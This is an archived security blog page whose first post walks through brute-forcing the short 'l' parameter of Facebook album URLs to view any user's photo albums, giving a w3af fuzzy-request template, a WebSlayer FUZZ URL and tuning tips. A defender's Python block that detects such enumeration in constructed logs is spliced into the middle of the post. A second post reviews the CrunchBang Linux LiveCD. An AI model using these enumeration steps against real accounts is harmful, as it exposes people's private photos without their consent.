http://www.flickr.com/photos/noneck/

Dave from Security Ninja shows how you can easily brute-force a certain parameter to gain access to any user’s Facebook photo album using Burp Suite. Here are the basics:

Access to albums on Facebook is controlled by three parameters of a URL; you can see them here:

http://www.facebook.com/album.php?aid=-3&id=1508034566&l=aad9c

aid=-3 (-3 for every public profile album)
id=0123456789 (Obtained by searching for the user and hovering over the add friend button)
l=? (all we know is that it’s 5 characters from the 0123456789abcdef range)
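What makes this enumerable is the size of `l`: five hex characters give only 16^5 possible values, so a token of that length offers almost no protection on its own. As an added defender’s example (not code from Dave’s post or from this one), the Python below computes that keyspace, scans a constructed sample of access log lines for clients that present many distinct `l` values against the same aid/id pair, and shows what an adequately sized random token looks like. The log format, the IP addresses and the `mint_album_token` helper are assumptions made for the example.

```python
import re
import secrets
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log lines (Common Log Format); not real Facebook traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2010:03:14:01 +0000] "GET /album.php?aid=-3&id=1508034566&l=00000 HTTP/1.0" 200 5120
203.0.113.7 - - [10/Mar/2010:03:14:01 +0000] "GET /album.php?aid=-3&id=1508034566&l=00001 HTTP/1.0" 200 5120
203.0.113.7 - - [10/Mar/2010:03:14:02 +0000] "GET /album.php?aid=-3&id=1508034566&l=00002 HTTP/1.0" 200 5120
203.0.113.7 - - [10/Mar/2010:03:14:02 +0000] "GET /album.php?aid=-3&id=1508034566&l=00003 HTTP/1.0" 200 5120
203.0.113.7 - - [10/Mar/2010:03:14:02 +0000] "GET /album.php?aid=-3&id=1508034566&l=00004 HTTP/1.0" 200 5120
203.0.113.7 - - [10/Mar/2010:03:14:03 +0000] "GET /album.php?aid=-3&id=1508034566&l=aad9c HTTP/1.0" 200 48211
198.51.100.4 - - [10/Mar/2010:03:15:10 +0000] "GET /album.php?aid=-3&id=1508034566&l=aad9c HTTP/1.0" 200 48211
198.51.100.4 - - [10/Mar/2010:03:15:12 +0000] "GET /album.php?aid=-3&id=1508034566&l=aad9c HTTP/1.0" 200 48211
"""

# client, ident, user, [timestamp], "METHOD target PROTOCOL", status, size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')


def token_keyspace(length, alphabet_size=16):
    """Number of distinct tokens a guesser must cover in the worst case."""
    return alphabet_size ** length


def parse_log_line(line):
    """Return (client_ip, status, query dict) for one CLF line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _method, target, status, _size = m.groups()
    query = {k: v[0] for k, v in parse_qs(urlsplit(target).query).items()}
    return ip, int(status), query


def find_token_enumeration(lines, threshold=5):
    """Flag clients that tried many distinct 'l' values for the same album (aid, id).

    A legitimate viewer presents the one token they were given; a client cycling
    through distinct tokens for one album is guessing. Returns a sorted list of
    (ip, aid, id, distinct_l_count) tuples at or above the threshold.
    """
    seen = defaultdict(set)
    for line in lines:
        parsed = parse_log_line(line)
        if parsed is None:
            continue
        ip, _status, q = parsed
        if "l" in q and "aid" in q and "id" in q:
            seen[(ip, q["aid"], q["id"])].add(q["l"])
    return sorted(
        (ip, aid, uid, len(tokens))
        for (ip, aid, uid), tokens in seen.items()
        if len(tokens) >= threshold
    )


def mint_album_token(nbytes=16):
    """Hypothetical replacement for the 5-hex-char 'l' value: 128 bits from the OS
    CSPRNG, hex-encoded (32 characters), which is not practical to enumerate."""
    return secrets.token_hex(nbytes)


if __name__ == "__main__":
    print("5 hex chars  ->", token_keyspace(5), "possible values")
    print("32 hex chars ->", token_keyspace(32), "possible values")
    for ip, aid, uid, n in find_token_enumeration(SAMPLE_LOG.splitlines()):
        print(f"enumeration suspected: {ip} tried {n} distinct l values for aid={aid} id={uid}")
    print("example token of adequate size:", mint_album_token())
```

The detection counts distinct `l` values per (client, aid, id) rather than raw request volume, so a user reloading the same shared album link is not flagged while a client walking the keyspace is; in production the same grouping should be evaluated per time window and combined with rate limiting on the endpoint.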

Dave uses Burp Suite, but there are many ways you can go about it. I think a dictionary of possible values might be marginally faster (untested) so I’ll use that.

First is one of my favorite methods, w3af’s Fuzzy Requests and Clustered Response tools.

GET http://www.facebook.com/album.php?aid=-3&id=targetsid&l=$[l.strip() for l in file('fbhex.dic').readlines()]$ HTTP/1.0
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded

Here’s the dictionary (1.1MB, zipped), extract it to your w3af directory.

After the run is finished, run the Cluster tool and wait. The valid page should show up far away from the rest of them.

Another tool that could be used for this is Edge Security’s WebSlayer:
URL:
http://www.facebook.com/album.php?aid=-3&id=targetsid&l=FUZZ
Set it to ignore lines so you can find your valid request faster. Currently, the error page contains 71 lines, but this may be different for you. Just run the scan for a few seconds and look at the number of lines that each error page contains, then stop the scan, enter the number in the ignore lines box and start again.


Other useful features of WebSlayer are the ability to control the rate and set proxy options.

There are likely MANY other tools that you can use to accomplish this task, but these seem to be the simplest.
Good luck, and remember:

Check out Dave’s post for the Burp Suite method he uses to generate the needed parameter.


Looks like I found my new favorite LiveCD. Now normally I only review security distros here, but I have to make an exception for CrunchBang. It is quite possibly the best Ubuntu hack I’ve seen since Mint.

[Gentoo users can stop reading now]

The balance of performance, stability, usability and overall “leetness” of CrunchBang is unparalleled by any currently active distribution. Now mind you, I tend to toss those words around for any distro that has the words Openbox and Debian/Ubuntu in its description. Speaking of which… :)

Description:

CrunchBang Linux is an Ubuntu based distribution featuring the lightweight Openbox window manager and GTK+ applications. The distribution has been built and customized from a minimal Ubuntu install. The distribution has been designed to offer a good balance of speed and functionality.

CrunchBang Lite comes with these core applications:

Run Program → gmrun
Terminal → Terminator Terminal Emulator
Web Browser → Firefox 3 web browser
File Manager → PCMan File Manager
Media Player → VLC media player
Text Editor → Leafpad

And the following terminal applications:

Vim editor
Midnight Commander file manager
rtorrent BitTorrent Client
MOC music player
Newsbeuter feed reader
elinks web browser
MUTT email client
irssi IRC client
naim chat client
htop system monitor

Screenshots (in no particular order, thanks to WordPress):

Gripes:
You’ll notice a screenshot of the autostart file, which seemed to be the only place to get rid of the default UK keyboard layout. Unfortunately, 5am Linuxing prevented me from being able to figure out how to make the settings stick…

CrunchBang Linux is also available in Standard and Eee PC editions.


© 2010 nukeitdotorg Suffusion WordPress theme by Sayontan Sinha